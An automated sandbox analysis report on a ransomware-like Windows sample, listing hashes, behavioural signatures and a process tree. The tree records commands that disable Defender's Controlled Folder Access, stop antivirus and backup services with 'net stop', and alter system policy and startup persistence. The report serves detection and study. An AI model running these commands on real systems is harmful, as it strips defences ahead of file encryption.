Overview
overview
10Static
static
1058bfb9fa88...1f.exe
windows10-2004-x64
1058bfb9fa88...1f.exe
windows11-21h2-x64
105d40615701...3d.exe
windows10-2004-x64
105d40615701...3d.exe
windows11-21h2-x64
10ae66e009e1...75.exe
windows10-2004-x64
ae66e009e1...75.exe
windows11-21h2-x64
c460fc0d4f...50.exe
windows10-2004-x64
10c460fc0d4f...50.exe
windows11-21h2-x64
10Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-09-2024 22:57
Behavioral task
behavioral1
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win11-20240802-en
Behavioral task
behavioral3
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win11-20240802-en
Behavioral task
behavioral5
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral6
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win11-20240802-en
Behavioral task
behavioral7
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral8
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win11-20240802-en
General
-
Target
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
-
Size
91KB
-
MD5
be60e389a0108b2871dff12dfbb542ac
-
SHA1
14b4e0bfac64ec0f837f84ab1780ca7ced8d670d
-
SHA256
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d
-
SHA512
6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641
-
SSDEEP
1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI
Malware Config
Signatures
-
Renames multiple (75) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops startup file 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 2340 sc.exe 1416 sc.exe 4464 sc.exe 3280 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
net.exetaskkill.exenet1.exenet.exenet.exenet.exenet.exetaskkill.exenet1.exesc.exenet1.exenet1.exenet1.exenet1.exe5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exenet1.exenet.exenet.exenet1.exenet1.exenet1.exenet1.exenet.exenet1.exenet1.exenet.exenet.exenet.exenet.exenet1.exenet1.exenet.exenet.exenet1.execmd.exesc.exenet.exesc.exenet.exenet.exenet1.exenet1.exenet.execmd.exenet.exenet1.exenet1.exenet1.execmd.exechoice.exenet.exenet.exenet.exenet.exenet1.execmd.exePING.EXEfsutil.exesc.exenet.exenet1.exenet1.exepowershell.exenet.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fsutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 2644 cmd.exe 5552 PING.EXE -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 912 taskkill.exe 3716 taskkill.exe 432 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 1144 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepowershell.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 912 taskkill.exe Token: SeDebugPrivilege 3716 taskkill.exe Token: SeDebugPrivilege 432 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exepid process 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exedescription pid process target process PID 2968 wrote to memory of 2688 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 2968 wrote to memory of 2688 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 2968 wrote to memory of 2688 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe powershell.exe PID 2968 wrote to memory of 1028 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 1028 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 1028 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4676 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4676 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4676 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3732 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3732 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3732 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 1844 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 1844 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 1844 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 5108 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 5108 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 5108 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3056 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3056 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3056 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 1800 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 1800 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 1800 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2400 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2400 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2400 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2636 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2636 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2636 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3900 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3900 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3900 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3768 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3768 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3768 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3992 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3992 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3992 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2064 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2064 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2064 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3188 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3188 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 3188 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4568 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4568 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4568 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4280 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4280 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4280 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2940 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2940 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2940 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4944 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4944 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 4944 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2068 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2068 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2068 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 1804 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 1804 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 1804 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe PID 2968 wrote to memory of 2764 2968 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe net.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"1⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
- System Location Discovery: System Language Discovery
PID:1028 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
- System Location Discovery: System Language Discovery
PID:1908
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- System Location Discovery: System Language Discovery
PID:4676 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:888
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵
- System Location Discovery: System Language Discovery
PID:3732 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
- System Location Discovery: System Language Discovery
PID:2644
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵
- System Location Discovery: System Language Discovery
PID:1844 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:2828
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- System Location Discovery: System Language Discovery
PID:5108 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
- System Location Discovery: System Language Discovery
PID:5200
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵
- System Location Discovery: System Language Discovery
PID:3056 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
- System Location Discovery: System Language Discovery
PID:3204
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵
- System Location Discovery: System Language Discovery
PID:1800 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:1748
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:2400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
- System Location Discovery: System Language Discovery
PID:4636
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵
- System Location Discovery: System Language Discovery
PID:2636 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
- System Location Discovery: System Language Discovery
PID:5136
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵
- System Location Discovery: System Language Discovery
PID:3900 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
- System Location Discovery: System Language Discovery
PID:5320
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵
- System Location Discovery: System Language Discovery
PID:3768 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:1456
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵
- System Location Discovery: System Language Discovery
PID:3992 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:4080
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
- System Location Discovery: System Language Discovery
